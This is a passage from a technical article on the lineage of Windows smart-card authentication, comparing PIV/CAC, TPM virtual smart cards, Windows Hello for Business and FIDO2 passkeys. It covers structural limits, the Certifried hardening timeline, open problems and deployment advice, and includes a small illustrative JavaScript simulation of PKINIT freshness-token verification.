&lt;p&gt;Microsoft Entra ID supports FIDO2 in two flavours. &lt;em&gt;Device-bound passkeys&lt;/em&gt; live on a FIDO2 security key (a YubiKey 5 [@yubico-piv]) or in Microsoft Authenticator and cannot be extracted. &lt;em&gt;Synced passkeys&lt;/em&gt; are credentials a platform synchronises across the user&apos;s devices through a cloud passkey provider [@entra-passkeys-howto] [@entra-passwordless]. The trade-off is sharp: device-bound passkeys support attestation (the relying party can verify authenticator hardware at registration); synced passkeys do not.&lt;/p&gt;
&lt;p&gt;For workforce identity, Microsoft&apos;s passwordless strategy describes a four-step journey: deploy a password-replacement option, reduce user-visible password surface, transition to passwordless, eliminate passwords [@passwordless-strategy]. WHfB and FIDO2 are the two recommended replacements.&lt;/p&gt;
&lt;p&gt;What about smart cards? The Microsoft Learn Virtual Smart Card Overview now opens with a Warning box that reads, in full: &quot;Windows Hello for Business and FIDO2 security keys are modern, two-factor authentication methods for Windows. Customers using virtual smart cards are encouraged to move to Windows Hello for Business or FIDO2. For new Windows installations, we recommend Windows Hello for Business or FIDO2 security keys&quot; [@vsc-overview]. The deprecation signal could not be more explicit. Physical PIV and CAC cards are not deprecated -- the federal government is not switching off PIV -- but the structural recommendation for greenfield is now WHfB or FIDO2.&lt;/p&gt;
&lt;p&gt;Why did Virtual Smart Cards not survive into the WHfB era? Three reasons.&lt;/p&gt;
&lt;p&gt;The first is provisioning UX. A VSC requires four steps (&lt;code&gt;tpmvscmgr create&lt;/code&gt;, certificate enrolment, PIN set, logon round-trip) where WHfB requires one (a setup wizard the user runs at first sign-in). Each VSC step can fail in idiosyncratic ways: the enterprise CA template not configured for VSCs, the user&apos;s certificate request rejected, the PIN policy mismatched between the GPO and the card. Even when every step succeeds, the user sees a &quot;smart card&quot; UI -- card reader prompts, PIN entries -- that does not match the device they are holding.&lt;/p&gt;
&lt;p&gt;The second is recovery. A TPM clear destroys VSC keys irrecoverably. Microsoft Learn states the constraint plainly [@vsc-understanding]: &quot;all private information on the virtual smart card is encrypted by using the TPM on the host computer.&quot; Recovery would have to be re-enrolment under a federated attestation chain. The AIK-and-EK-cert attestation mode in &lt;code&gt;tpmvscmgr&lt;/code&gt; exists [@tpmvscmgr], but it never grew into a productised re-enrolment story; the practical answer was always &quot;issue a new card.&quot;&lt;/p&gt;
&lt;p&gt;The third is the multi-device world. VSCs bind one credential to one device. By 2017 most enterprise users had at least two devices: a laptop and a phone. By 2022 most had three. A credential metaphor borrowed from the era of one workstation per user could not stretch.&lt;/p&gt;
&lt;p&gt;Where do physical smart cards still belong in 2026? Three places. First, federal PIV / DoD CAC: the badge IS the credential, the issuance lifecycle is owned by an external organisation, and the cards have to work cross-platform and cross-application in a way a Windows-only credential cannot. Second, high-assurance regulated industries (banking, healthcare imaging, court systems) where existing PKI investment and signed-document workflows make the card the institutional artifact, not just an authentication factor. Third, &quot;smart card removal locks workstation&quot; cases (operating-room PCs, trading-floor terminals) where the physical act of pulling the card out of the reader is the security control.&lt;/p&gt;
&lt;p&gt;Where does Entra Certificate-Based Authentication fit? Entra CBA is the cloud-native PIV/CAC path. A federal user logs into Entra ID directly with their PIV/CAC card, bypassing the on-premises ADFS infrastructure that was the traditional cloud-bridge for federal organisations. Entra CBA preserves the PIV credential while replacing the on-premises STS, and is the practical answer to &quot;we have to keep PIV, but also we are migrating to cloud.&quot;&lt;/p&gt;
&lt;p&gt;The table below condenses the comparison.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Method&lt;/th&gt;
&lt;th&gt;Where the key lives&lt;/th&gt;
&lt;th&gt;Origin binding&lt;/th&gt;
&lt;th&gt;NTLM secondary&lt;/th&gt;
&lt;th&gt;Provisioning steps&lt;/th&gt;
&lt;th&gt;Multi-device&lt;/th&gt;
&lt;th&gt;Phishing resistance&lt;/th&gt;
&lt;th&gt;Recovery&lt;/th&gt;
&lt;th&gt;Suitable for new deployments&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Physical PIV / CAC&lt;/td&gt;
&lt;td&gt;Removable IC&lt;/td&gt;
&lt;td&gt;No (relay possible)&lt;/td&gt;
&lt;td&gt;Yes (until NTLM removed)&lt;/td&gt;
&lt;td&gt;High (PKI + issuance)&lt;/td&gt;
&lt;td&gt;Yes (cross-device by physical movement)&lt;/td&gt;
&lt;td&gt;Conditional&lt;/td&gt;
&lt;td&gt;Re-issue card&lt;/td&gt;
&lt;td&gt;Federal/DoD only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TPM Virtual Smart Card&lt;/td&gt;
&lt;td&gt;On-device TPM&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (until NTLM removed)&lt;/td&gt;
&lt;td&gt;High (4-step)&lt;/td&gt;
&lt;td&gt;No (bound to one TPM)&lt;/td&gt;
&lt;td&gt;Conditional&lt;/td&gt;
&lt;td&gt;Re-enrol&lt;/td&gt;
&lt;td&gt;Not recommended (deprecation Warning)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WHfB key-trust&lt;/td&gt;
&lt;td&gt;On-device TPM&lt;/td&gt;
&lt;td&gt;Limited (RP=Entra)&lt;/td&gt;
&lt;td&gt;Reduced (cloud Kerberos)&lt;/td&gt;
&lt;td&gt;Low (in-OS wizard)&lt;/td&gt;
&lt;td&gt;Per-device enrolment&lt;/td&gt;
&lt;td&gt;Yes (relative)&lt;/td&gt;
&lt;td&gt;Re-enrol via device registration&lt;/td&gt;
&lt;td&gt;Yes (cloud/hybrid)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WHfB cert-trust&lt;/td&gt;
&lt;td&gt;On-device TPM&lt;/td&gt;
&lt;td&gt;Limited (RP=AD)&lt;/td&gt;
&lt;td&gt;Yes (until NTLM removed)&lt;/td&gt;
&lt;td&gt;Medium (PKI required)&lt;/td&gt;
&lt;td&gt;Per-device enrolment&lt;/td&gt;
&lt;td&gt;Conditional&lt;/td&gt;
&lt;td&gt;Re-enrol; CA-issued cert&lt;/td&gt;
&lt;td&gt;Yes (brownfield PKI)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;FIDO2 security key&lt;/td&gt;
&lt;td&gt;External authenticator (e.g., YubiKey)&lt;/td&gt;
&lt;td&gt;Yes (WebAuthn RP ID)&lt;/td&gt;
&lt;td&gt;Not applicable (no Kerberos)&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Yes (key is portable)&lt;/td&gt;
&lt;td&gt;Yes (origin-bound)&lt;/td&gt;
&lt;td&gt;Spare key or backup credential&lt;/td&gt;
&lt;td&gt;Yes (high-assurance)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Entra device-bound passkey&lt;/td&gt;
&lt;td&gt;TPM or external authenticator&lt;/td&gt;
&lt;td&gt;Yes (WebAuthn RP ID)&lt;/td&gt;
&lt;td&gt;Not applicable&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Per-device&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Re-enrol&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Entra synced passkey&lt;/td&gt;
&lt;td&gt;Cloud-synced (no attestation)&lt;/td&gt;
&lt;td&gt;Yes (WebAuthn RP ID)&lt;/td&gt;
&lt;td&gt;Not applicable&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Yes (cloud-synced)&lt;/td&gt;
&lt;td&gt;Yes (origin-bound)&lt;/td&gt;
&lt;td&gt;Cloud provider recovery&lt;/td&gt;
&lt;td&gt;Yes (consumer, low-friction)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The architecture is now mature. But the lineage has a hard ceiling no architecture can cross: a signing oracle cannot tell you what it signed &lt;em&gt;for&lt;/em&gt;.&lt;/p&gt;
&lt;h2&gt;8. What a Card Edge Can and Cannot Mediate&lt;/h2&gt;
&lt;p&gt;Set aside provisioning UX. Set aside NTLM legacy. Set aside everything Windows-specific. What are the &lt;em&gt;structural&lt;/em&gt; limits any card-edge-or-equivalent design must accept? Six, by my count, and each one is anchored to a primary source.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The card edge is a signing oracle, not a transcript witness.&lt;/strong&gt; A PIV card receives a hash and returns a signature. It does not know what protocol the signature is for, what relying party requested it, or whether the same hash has been requested two minutes ago by an attacker on a wireless network. PKINIT&apos;s vulnerability to relay was open from 2006 (RFC 4556) until 2017 (RFC 8070, which added a freshness token to the AS exchange) [@rfc-4556] [@rfc-8070]. The fix had to live in the &lt;em&gt;protocol&lt;/em&gt;, not in the card. The card cannot prove what it signed &lt;em&gt;for&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The card has no notion of relying-party identity.&lt;/strong&gt; This is the structural defect WebAuthn fixes. A WebAuthn authenticator includes the RP ID in the signed assertion and refuses to release a signature for the wrong RP. The W3C specification states this property explicitly [@webauthn-2]. A PIV card does not. To add an equivalent property to the smart card lineage would have meant changing the SP 800-73 command set; it was easier to throw the PC/SC card edge away and start over with FIDO2.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cryptographic protection at the card edge cannot reach downstream OS-minted credentials.&lt;/strong&gt; This is the 2014 NTLM-secondary lesson at its most general. The card protects a key; the OS may mint credentials around that key the card cannot police. Microsoft KB 2871997 closed the leak with defence-in-depth retrofits (TokenLeakDetectDelaySecs, Protected Users, RunAsPPL, eventually Credential Guard) [@kb-2871997] [@msrc-kb-2871997] [@protected-users] [@credential-guard]; the structural close had to wait for the 2024-2026 NTLM removal programme [@ntlmv1-removal]. Any future credential the OS mints around the card&apos;s key is, by construction, outside the card&apos;s authority.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Revocation must be reachable, and the card cannot tell you when it is not.&lt;/strong&gt; A PIV card&apos;s certificate is a relying-party-side concept; revocation status is a property of the issuing PKI, not the card. CRL distribution points and OCSP responders are the relying party&apos;s problem to reach. When a domain controller cannot reach the CRL, the policy choice is to fail open or fail closed; either policy carries risk. The &lt;code&gt;[MS-PKCA]&lt;/code&gt; Windows profile specifies server-side certificate-validation processing -- including revocation checking -- as a property of the KDC, not the credential the card presented [@ms-pkca]. The card signed correctly either way.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Certificate-to-user mapping must be strongly bound, and again the card cannot help.&lt;/strong&gt; When a domain controller receives a PKINIT request, it must map the presented certificate to an Active Directory account. The Certifried CVE class disclosed in May 2022 (CVE-2022-26923, CVE-2022-26931, CVE-2022-34691) showed that weak mapping -- by Subject Alternative Name UPN without a strong identifier bound into the certificate -- lets an attacker who can enrol against an over-permissive template impersonate any account [@kb-5014754]. The card signed exactly what it was asked to sign; the structural defect was at the KDC&apos;s mapping step. Microsoft KB 5014754 closed the mapping defect by requiring strong certificate-to-account binding; we return to its multi-year deployment timeline in §9 [@kb-5014754].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Hardware-bound keys cannot be teleported -- and this is both feature and limit.&lt;/strong&gt; Non-exportability is the central promise of the entire lineage. It is also the bound. A TPM clear or a hardware replacement destroys the key. The recovery story has to be re-enrolment, not restore. Microsoft Learn states the constraint for VSCs and the same constraint applies, structurally, to every TPM-bound or external-authenticator credential -- including FIDO2 device-bound passkeys [@vsc-understanding]. Synced passkeys recover this property by giving up attestation; you cannot have both.&lt;/p&gt;

Non-exportability is the property. It is also the bound.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; An ideal card-lineage authenticator refuses to sign without RP-issued freshness, refuses to release a signature outside its RP scope, leaves no downstream-cacheable credential material, attests to its hardware at registration, and supports identity portability via re-enrolment-under-attestation rather than key portability. No shipping authenticator delivers all five of these authenticator-side properties in a workforce-grade product today; the two RP-side limits (revocation reachability, certificate-to-user mapping) are necessarily closed at the relying party, not the authenticator. The combination is the work of the next decade.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Limit&lt;/th&gt;
&lt;th&gt;What it forbids&lt;/th&gt;
&lt;th&gt;Primary source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Signing oracle, not transcript witness&lt;/td&gt;
&lt;td&gt;Card cannot prove signature was for the intended protocol context&lt;/td&gt;
&lt;td&gt;RFC 4556 / RFC 8070 [@rfc-4556] [@rfc-8070]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;No RP identity&lt;/td&gt;
&lt;td&gt;Card cannot refuse a relay; relay window must close in protocol&lt;/td&gt;
&lt;td&gt;WebAuthn 2 [@webauthn-2]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;No reach to downstream OS credentials&lt;/td&gt;
&lt;td&gt;Card protects key, not identity around the key&lt;/td&gt;
&lt;td&gt;KB 2871997, MSRC [@kb-2871997] [@msrc-kb-2871997]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Revocation is not self-asserting&lt;/td&gt;
&lt;td&gt;Card cannot vouch for its own validity; KDC must reach the PKI&lt;/td&gt;
&lt;td&gt;[MS-PKCA] [@ms-pkca]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Strong cert-to-user mapping is not card-asserted&lt;/td&gt;
&lt;td&gt;Relying party must bind certificate to AD account; card has no view of the mapping&lt;/td&gt;
&lt;td&gt;KB 5014754 [@kb-5014754]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Non-exportability bounds portability&lt;/td&gt;
&lt;td&gt;Key dies with the chip; recovery must be re-enrolment&lt;/td&gt;
&lt;td&gt;VSC Understanding [@vsc-understanding]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Some limits are being closed. The signing-oracle limit is mitigated by RFC 8070 freshness tokens; the RP-identity limit is closed for new credentials by WebAuthn; the downstream-credential limit is being closed by NTLM removal; the strong-mapping limit was closed by KB 5014754 on shipping AD infrastructure between February and September 2025. Others are inherent: a non-exportable key is, by definition, not portable. The next decade of smart-card-lineage work is being shaped by which is which.&lt;/p&gt;
&lt;h2&gt;9. Open Problems for the Next Decade&lt;/h2&gt;
&lt;p&gt;Five problems are still open in 2026. Each has a candidate fix in flight; none has shipped to general availability for the workforce case.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PIV / CAC in a post-NTLM Windows estate.&lt;/strong&gt; NTLMv1 was removed from Windows 11 24H2 and Windows Server 2025 [@ntlmv1-removal]; NTLMv2 is on the deprecation track [@deprecated-features]. What does &quot;smart card required for interactive logon&quot; &lt;em&gt;mean&lt;/em&gt; in a forest with no NTLMv1 secondary credential? The historical answer was &quot;the KDC mints an NT hash so legacy services keep working.&quot; The new answer must be either &quot;no NT hash; legacy services break&quot; or &quot;an NT hash for NTLMv2 only, restricted by SCRIL rotation and Protected Users membership.&quot; Microsoft has not yet published a complete blueprint for what federal PIV deployments look like after NTLMv2 also retires. Credential Guard&apos;s role in the transition is to make any residual secondary credential harder to harvest [@credential-guard] [@protected-users].&lt;/p&gt;

Three concrete questions a federal IT shop should be asking. First: does our forest have any domain controllers still serving NTLMv1 to legacy clients? After 24H2 / Server 2025, the answer should be no [@ntlmv1-removal]. Second: are our privileged accounts in Protected Users? The group blocks NTLM, DES, RC4 pre-auth, and constrained or unconstrained delegation [@protected-users]; for a smart-card-required account, membership effectively removes the RC4-HMAC-via-NTLM-hash attack surface even before NTLMv2 retirement. Third: is Credential Guard enabled on every member system? On Windows 11 22H2 and Server 2025, it is on by default for hardware-eligible domain-joined non-DC systems [@credential-guard]. These three measures are the practical answer to &quot;what does smart-card-required mean today.&quot; The full structural answer waits on NTLMv2 retirement.
&lt;p&gt;&lt;strong&gt;The recovery primitive that never shipped.&lt;/strong&gt; TPM-clear or device replacement destroys TPM-bound keys; this is the cost of non-exportability. AIK-and-EK-cert attestation in &lt;code&gt;tpmvscmgr&lt;/code&gt; could in principle support federated re-enrolment with strong proof of platform identity [@tpmvscmgr], and the Entra passkey enrolment flow supports attestation-required policies [@entra-passkeys-howto], but neither path matured into a &quot;your VSC died; here is how the help desk restores you in fifteen seconds&quot; story. Synced passkeys recover this property by giving up attestation. Workforce-grade attestation &lt;em&gt;and&lt;/em&gt; easy recovery, together, is still not shipping.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The certificate-based-authentication hardening lag.&lt;/strong&gt; Microsoft&apos;s KB 5014754 hardens certificate-based authentication on Windows domain controllers against the Certifried CVE class (CVE-2022-26923, CVE-2022-26931, CVE-2022-34691) by requiring strong certificate-to-user mapping at the KDC. The CVE class was disclosed on May 10, 2022. The mitigation moved DCs to Enforcement mode by default on February 11, 2025, with a fallback to Compatibility mode still available; the override was finally retired on September 9, 2025 [@kb-5014754]. The KB&apos;s own change log records several intermediate slips of the Full-Enforcement target (the original commitment was a 2023 milestone, slipping to February 2025 and then to September 2025) [@kb-5014754]. That is roughly three years from CVE disclosure to default Enforcement and a further seven months to end-of-override on shipping infrastructure -- and the gap from the &lt;em&gt;first published&lt;/em&gt; Full-Enforcement target to the actual end-of-override stretches the slip to a multi-year story in its own right. The lesson is sobering: in a brownfield estate, the time from &quot;CVE disclosed&quot; to &quot;hardening fully enforced on every domain controller&quot; is measured in &lt;em&gt;years&lt;/em&gt;, not weeks. Separately, RFC 8070 PKINIT freshness tokens (February 2017) are a &lt;em&gt;different&lt;/em&gt; hardening programme [@rfc-8070]; Windows has not deployed RFC 8070 freshness as the default in the broad estate, and the article&apos;s RunnableCode in §10 illustrates the freshness exchange rather than documenting deployed Windows behaviour. Any protocol-level fix to the smart-card lineage in 2026 will, on the KB 5014754 evidence, take three to four years to land -- and longer if the standards process itself slips, as RFC 8070&apos;s still-undeployed status (over nine years since publication) suggests.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cross-platform card-edge longevity.&lt;/strong&gt; OpenSC and pcsc-lite still implement NIST SP 800-73 on macOS and Linux; the cross-platform PIV story works for basic logon. But the modern features Windows keeps adding -- attestation chains, device-bound credential extensions, integration with the Entra passkey APIs -- lag on the open-source side. Whether PC/SC outlives the platforms that built it is genuinely uncertain. Some federal organisations will keep PIV alive cross-platform as policy; many private-sector deployments will quietly move off.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Post-quantum signature algorithms on smart cards.&lt;/strong&gt; PIV&apos;s current baseline is RSA-2048 and ECDSA P-256 -- not post-quantum resistant. NIST&apos;s post-quantum standardisation selected ML-DSA (Module Lattice DSA, formerly Dilithium) and SLH-DSA (Stateless Hash-Based DSA, formerly SPHINCS+); both have key and signature sizes substantially larger than RSA-2048 or ECDSA P-256, and both will stress the storage and bandwidth budgets of a typical PIV card. SP 800-73-4 has no slots for post-quantum keys today [@sp-800-73-4-upd1] [@fips-201-3]. A future revision will have to accommodate them, and the existing population of $\approx$ five million PIV cards [@nist-piv-home] will not all be PQ-capable at once. The transition runs on a card-issuance cycle: roughly $T_{\text{transition}} \approx T_{\text{issuance}} + T_{\text{rollout}}$, each term in the multi-year range.&lt;/p&gt;
&lt;p&gt;Architecture is a question about which problems your design &lt;em&gt;cannot&lt;/em&gt; solve. The next section is for the architect who has to choose right now, with all five problems still open.&lt;/p&gt;
&lt;h2&gt;10. Choosing Between PIV, VSC, WHfB, and FIDO2 in 2026&lt;/h2&gt;
&lt;p&gt;Four operator-grade callouts. Pick the one that matches your context.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Stay on PIV / CAC for the foreseeable future. FIPS 201-3 is the current standard and SP 800-73 the current card-edge interface; policy mandates are not changing on a tactical timeline [@fips-201-3] [@nist-piv-home]. Add Entra Certificate-Based Authentication for cloud workloads so the same PIV card authenticates to Microsoft 365 and Azure resources without going through on-premises ADFS. For the three operational controls -- Credential Guard, Protected Users membership for privileged accounts, and NTLMv1-removal status -- see the federal-IT checklist in the §9 Aside. Do not rely on the smart card alone to defeat NTLM-secondary-credential abuse until NTLM removal has reached your environment.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Pick WHfB key-trust if you are cloud-first or hybrid, cert-trust if you have an existing on-premises PKI you need to honour [@whfb-deploy] [@whfb-how-it-works]. Add FIDO2 security keys for the populations that need cross-device portability or strict phishing resistance: contractors, executives, IT administrators, anyone whose credential theft would be catastrophic [@webauthn-2] [@passwordless-strategy]. Do not pick Virtual Smart Cards for new deployments; the Microsoft Learn VSC Overview deprecation Warning quoted verbatim in §7 applies [@vsc-overview].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Continue to operate it but plan migration to WHfB. Audit your recovery and re-enrolment process: a TPM clear destroys VSC keys irrecoverably, so any disaster-recovery plan that assumes you can move a credential between devices is wrong [@vsc-understanding]. Do not assume your VSC deployment is &quot;supported&quot; the way it was in 2014; the deprecation Warning quoted in §7 applies here [@vsc-overview]. The cleanest exit path is to enrol the same users into WHfB cert-trust against your existing PKI, then retire the VSC layer once the WHfB credential is operational.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; FIDO2 security keys with attested device-bound credentials [@webauthn-2] [@ctap-2-1], paired with Microsoft Entra ID passkeys. Use attestation-required profiles for high-assurance populations (so the relying party can verify the authenticator hardware) and attestation-optional profiles for less sensitive populations who benefit from synced-passkey recovery [@entra-passkeys-howto] [@entra-passwordless]. The trade-off remains: device-bound passkeys are attestable but not portable; synced passkeys are portable but not attestable. Match the profile to the population, not the population to the profile.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;For the architect who wants to see how PKINIT freshness enforcement would work if the RFC 8070 extension were enforced, the JavaScript below simulates the nonce check. The KDC issues a freshness token; the client includes it in the signed &lt;code&gt;PKAuthenticator&lt;/code&gt;; the KDC verifies that the token in the signed structure matches the one it issued. This is illustrative protocol behaviour, not the Windows default today.&lt;/p&gt;
&lt;p&gt;{`
function kdcIssueFreshness() {
  const token = Math.random().toString(16).slice(2, 18);
  return { token, issuedAt: Date.now() };
}&lt;/p&gt;
&lt;p&gt;function clientSignAuthPack({ freshness, cardSign }) {
  const pkAuthenticator = {
    cusec: 0,
    ctime: Date.now(),
    nonce: Math.floor(Math.random() * 1e9),
    freshness: freshness.token,
    paChecksum: &apos;sha256-of-paData&apos;,
  };
  const signature = cardSign(JSON.stringify(pkAuthenticator));
  return { pkAuthenticator, signature };
}&lt;/p&gt;
&lt;p&gt;function kdcVerify({ pkAuthenticator, signature }, issued) {
  const tooOld = Date.now() - issued.issuedAt &amp;gt; 5 * 60 * 1000;
  if (tooOld) return { ok: false, reason: &apos;freshness token too old&apos; };
  if (pkAuthenticator.freshness !== issued.token) {
    return { ok: false, reason: &apos;freshness token does not match&apos; };
  }
  return { ok: true };
}&lt;/p&gt;
&lt;p&gt;const issued = kdcIssueFreshness();
const cardSign = (msg) =&amp;gt; &apos;sig(&apos; + msg.length + &apos;)&apos;;
const signed = clientSignAuthPack({ freshness: issued, cardSign });&lt;/p&gt;
&lt;p&gt;console.log(&apos;Honest client:&apos;, kdcVerify(signed, issued));&lt;/p&gt;
&lt;p&gt;const replayed = { ...signed, pkAuthenticator: { ...signed.pkAuthenticator, freshness: &apos;stale-token-1234&apos; } };
console.log(&apos;Replayed with stale token:&apos;, kdcVerify(replayed, issued));
`}&lt;/p&gt;
&lt;p&gt;Whichever method you choose, no method alone defeats the legacy compatibility surfaces the card was never designed to police. The structural fix lives in the protocol-removal programme finishing through 2026 and beyond.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

Yes functionally and cryptographically; no physically. A VSC exposes the same PC/SC card edge, Microsoft Smart Card KSP, and minidriver model as a physical card. Above the minidriver layer, every Windows component sees it as a smart card. Tamper-resistance comes from the host TPM rather than a removable IC; Microsoft Learn lists TPM 1.2 as the documented minimum -- VSCs predate TPM 2.0 [@vsc-overview] [@vsc-understanding].

No, by construction. The card signs internally and returns the signature. The only material that leaves during normal operation is the signed output (or, for key exchange, an unwrapped symmetric session key the card has decrypted with the wrapping key). The private key is generated on-card during enrolment and cannot be extracted; that property is the load-bearing security claim of the entire lineage.

Legacy NTLM compatibility. Many pre-Windows-2000 services speak only NTLM, and accounts flagged &quot;smart card required for interactive logon&quot; must still authenticate to them. KB 2871997 (May 13, 2014) added auto-rotation of the secondary credential at logon, reducing but not eliminating the attack surface [@kb-2871997]. The structural fix is NTLM removal: NTLMv1 has now been removed in Windows 11 24H2 and Windows Server 2025 [@ntlmv1-removal].

Yes. The YubiKey 5 series exposes a PIV applet that the inbox `msclmd.dll` minidriver recognises out of the box [@yubico-piv] [@inbox-minidriver]. Insert the YubiKey and Windows treats it as a PIV-compliant smart card; the same enrolment, PKINIT, and lock-screen workflows apply. The YubiKey 5 can act as a FIDO2 authenticator concurrently, which is the practical way to bridge smart-card and origin-bound passkey workflows on the same device.

Conditionally. PKINIT signs an `AuthPack` containing a nonce and a paChecksum; with the RFC 8070 freshness extension and a correctly validated KDC certificate, an attacker cannot trivially replay or relay an `AuthPack` signed by the client&apos;s smart card [@rfc-4556] [@rfc-8070]. But PKINIT is not origin-bound in the WebAuthn sense -- the card has no notion of which KDC the signature is for. If a trust assumption fails (an attacker plants a certificate in the client&apos;s NTAuth store, for example), the card will happily sign for the wrong KDC. WebAuthn&apos;s RP-ID-bound assertion is a stronger guarantee [@webauthn-2].

See the §6 Callout &quot;VSCs predate TPM 2.0&quot; for the full timeline. TPM 1.2 is the documented minimum; TPM 2.0 is the practical choice on Windows 11, which itself requires TPM 2.0 for the OS [@vsc-overview].

Three reasons, all expanded in §7: provisioning UX, TPM-clear recovery, and the multi-device world. Windows Hello for Business delivered the same TPM-bound-key benefits without the PC/SC abstraction cost (no virtual reader, no virtual minidriver, no APDU layer); FIDO2 then added cross-device portability and origin binding, neither of which the VSC architecture could deliver. The Microsoft Learn VSC Overview deprecation Warning quoted verbatim in §7 makes the recommendation explicit [@vsc-overview] [@passwordless-strategy].

Both are CNG Key Storage Providers. The Smart Card KSP routes calls through the minidriver to either a physical card or a TPM VSC; the cryptographic operation is APDU-encoded and sent to the card. The Platform Crypto Provider routes calls directly to the TPM via TPM Base Services; there is no card abstraction in the path. Windows Hello for Business uses the Platform Crypto Provider for TPM-bound key operations [@cng-ksp-list] [@whfb-how-it-works].
&lt;p&gt;The card was always a metaphor. The cryptographic primitive at its centre -- a non-exportable asymmetric key, bound to a tamper-resistant element, gated by a local gesture -- is the longest-lived object in this lineage. Every generation transition (PC/SC -&amp;gt; CryptoAPI/CNG -&amp;gt; inbox PIV/GIDS -&amp;gt; Virtual Smart Card -&amp;gt; WHfB -&amp;gt; FIDO2) was a transition of the &lt;em&gt;interface around&lt;/em&gt; that primitive, not of the primitive itself. The May 2014 contractor whose CAC signed the right blob and lost her account anyway was the canary; the fix she needed was not on her card but in a decade-long programme to remove the OS-minted secondary credentials that lived outside the card&apos;s authority. Windows is most of the way through that programme now. The card that wasn&apos;t a card outgrew its metaphor -- and the protection it always promised is, finally, arriving at the authentication outcome.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;smart-cards-and-virtual-smart-cards-in-windows-the-card-centric-auth-lineage&quot; keyTerms={[
  { term: &quot;APDU&quot;, definition: &quot;Application Protocol Data Unit. The request/response unit a host application exchanges with a smart card; header CLA INS P1 P2, optional Lc/data/Le, response SW1 SW2.&quot; },
  { term: &quot;PC/SC&quot;, definition: &quot;Personal Computer/Smart Card. The 1996 industry consortium and its specification series for how a smart card reader is exposed to a desktop OS.&quot; },
  { term: &quot;PKINIT&quot;, definition: &quot;Public Key Cryptography for Initial Authentication in Kerberos. Lets a client present an X.509 certificate as Kerberos pre-authentication instead of a password-derived shared secret.&quot; },
  { term: &quot;AuthPack&quot;, definition: &quot;The PKINIT structure containing PKAuthenticator and Diffie-Hellman parameters that the client signs and embeds in the PA-PK-AS-REQ pre-authentication data of the Kerberos AS-REQ.&quot; },
  { term: &quot;CSP&quot;, definition: &quot;Cryptographic Service Provider. A CryptoAPI 1.0 plug-in providing cryptographic services to applications, loaded in-process.&quot; },
  { term: &quot;KSP&quot;, definition: &quot;Key Storage Provider. The CNG-era plug-in for key storage and asymmetric cryptographic operations, with Microsoft Smart Card KSP for cards and VSCs and Microsoft Platform Crypto Provider for direct TPM access.&quot; },
  { term: &quot;Minidriver&quot;, definition: &quot;A small per-card DLL loaded by the Microsoft Base Smart Card CSP and Smart Card KSP that contains card-specific behaviour; the inbox msclmd.dll covers PIV and GIDS cards out of the box.&quot; },
  { term: &quot;Virtual Smart Card&quot;, definition: &quot;A TPM-backed software smart card introduced in Windows 8 in October 2012; exposes the same PC/SC card edge as a physical card with the TPM as backing chip.&quot; },
  { term: &quot;NTLM secondary credential&quot;, definition: &quot;The NT hash Windows maintains for smart-card-only accounts so legacy NTLM-accepting services continue to authenticate the user; harvestable from LSASS and replayable in pass-the-hash attacks.&quot; },
